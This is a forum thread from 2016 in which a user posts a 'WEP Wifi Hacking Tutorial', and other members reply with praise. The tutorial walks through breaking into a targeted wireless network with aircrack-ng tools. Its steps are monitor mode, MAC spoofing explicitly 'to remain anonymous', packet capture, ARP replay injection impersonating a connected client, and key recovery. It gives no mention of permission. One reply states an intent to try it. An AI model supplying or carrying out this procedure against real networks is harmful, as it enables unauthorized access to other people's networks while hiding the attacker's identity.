Login

AFG · 10-07-2016, 04:43 AM

WEP Wifi Hacking Tutorial

WEP stands for Wired Equivalent Privacy, and this form of encryption is relativity weak, so can be cracked with some speed. It has been replaced by modern networks by WPA and WPA2 encryption, which i will cover in subsequent tutorials, but WEP is still surprisingly common, so it is a worthy subject for the beginning tutorial in my series.

Cracking a WEP encryption basically works on the principle of capturing packets of data sent on the network, and using them to decode the encryption key.

We will be using Aircrack-NG in Kali Linux to crack the encryption in this tutorial, which is my favorite program for cracking wireless networks.

Note: You will need a wireless adapter that can support packet injection. Such as this one. Click Here.

1) Find your wireless adapters name

This is simple, just open a terminal and use this command to find your wireless adapters identifier:

Code:

Code:
airmon-ng

For example, the adapter name might me wlan0 or wlan1. You can check this by typing:

Code:
ifconfig

2) Open Aircrack-Ng in Kali

This step is self explanatory. Then, Put the Wireless Adapter into Monitor Mode or Promiscuous Mode, by using this command:

Code:

Code:
airmon-ng start wlan0

Of course, use the name of your wireless adapter in place of wlan0. airmon-ng will now name the monitor-mode wireless adapter wlan0mon.

IF YOU WANT TO REMAIN ANONYMOUS, THEN SPOOF YOUR MAC, run these commands:

Code:

Code:
ifconfig wlan0mon down

macchanger -m 99:88:77:66:55:44 wlan0mon

ifconfig wlan0mon up

This will change your MAC address of your wireless adapter, you can run it again for wlan0mon.

3) Start Capturing Traffic

We now need to start capturing "traffic" - wireless data being sent. We do this by using the airodump-ng command with the monitoring interface, wlan0mon, to capture and show us data about networks the interface can detect:

Code:

Code:
airodump-ng wlan0mon

You should see a list of Access Points appear after a small wait. Make sure the network you are targeting is using WEP encryption for this tutorial.

4) Capture traffic to/from the target AP

Use the following command to begin capturing data from the network you are targeting:

Code:

Code:
airodump-ng --bssid 00:11:22:33:44:55 -c 11 -w example wlan0mon

Replace 00:11:22:33:44:55 with the bssid of the network you are targeting, and the 11 with the channel of the target network. "example" is the name of the file you want to store the captured packets in. They are stored in pcap format. The channel and bssid are obtained from the list of networks you got in step 3.

5) Capture enough packets to crack the encryption!

We could just wait until we capture enough data, but there is a faster way: we will need to inject packets into the AP. We can do this by imitating or "spoofing" a legitimate user connected to the network, using their MAC address. Just wait until someone connects.

6) Inject ARP Traffic

Next, we can use the aireplay-ng command to spoof their MAC address and inject packets. We just need the bssid of the AP and the MAC address of the client who connected to the AP. All we need to do is capture an "ARP" (Address Resolution Protocol) packet and then replay that ARP thousands of times in order to generate the "initialization vectors" that we need to crack WEP! Run this command in a new terminal window:

Code:

Code:
aireplay-ng -3 -b 00:11:22:33:44:55 -h 99:88:77:66:55:44 wlan0mon

Where 00:11:22:33:44:55 is the bssid again, and 99:88:77:66:55:44 is the clients MAC address. After this command is run, the airodump-ng running in the other terminal will capture enough packets to crack the WEP.

7) Crack the Password

When we have captured several thousand packets, we can crack the password in the "example" file, by using the aircrack-ng command like this:

Code:

Code:
aircrack-ng example-01.cap

If we have enough IVs, aircrack-ng the key will be cracked and displayed on the screen, usually in hexadecimal format. You can now log in to the wireless using that key, and you are connected!

Thanks for reading, please reply with your thanks if you enjoyed this and/or found it useful.

Devil · 10-07-2016, 04:47 AM

This is very interesting @AFG

Nice share bud, keep it flowing Tongue

AFG · 10-07-2016, 04:49 AM

(10-07-2016, 04:47 AM)runescape Wrote: This is very interesting @AFG

Nice share bud, keep it flowing

Thanks buddy Smile

Red · 10-07-2016, 06:21 PM

Woah man, awesome guide! Definitely going to have to try this. Heart

AFG · 10-07-2016, 06:22 PM

(10-07-2016, 06:21 PM)Red Wrote: Woah man, awesome guide! Definitely going to have to try this.

Thanks my friend Smile

Red · 10-07-2016, 06:26 PM

(10-07-2016, 06:22 PM)AFG Wrote:
(10-07-2016, 06:21 PM)Red Wrote: Woah man, awesome guide! Definitely going to have to try this.

Thanks my friend

Anytime buddy. P.S. What's your Skype? I'll add you to the DF Chat.

AFG · 10-07-2016, 06:28 PM

(10-07-2016, 06:26 PM)Red Wrote:
(10-07-2016, 06:22 PM)AFG Wrote:
(10-07-2016, 06:21 PM)Red Wrote: Woah man, awesome guide! Definitely going to have to try this.

Thanks my friend

Anytime buddy. P.S. What's your Skype? I'll add you to the DF Chat.

PMed you.

Red · 10-07-2016, 06:29 PM

(10-07-2016, 06:28 PM)AFG Wrote:
(10-07-2016, 06:26 PM)Red Wrote:
(10-07-2016, 06:22 PM)AFG Wrote:
(10-07-2016, 06:21 PM)Red Wrote: Woah man, awesome guide! Definitely going to have to try this.

Thanks my friend

Anytime buddy. P.S. What's your Skype? I'll add you to the DF Chat.

PMed you.

I gotchu.

Login
Username:
Password:	Lost Password?
	Remember me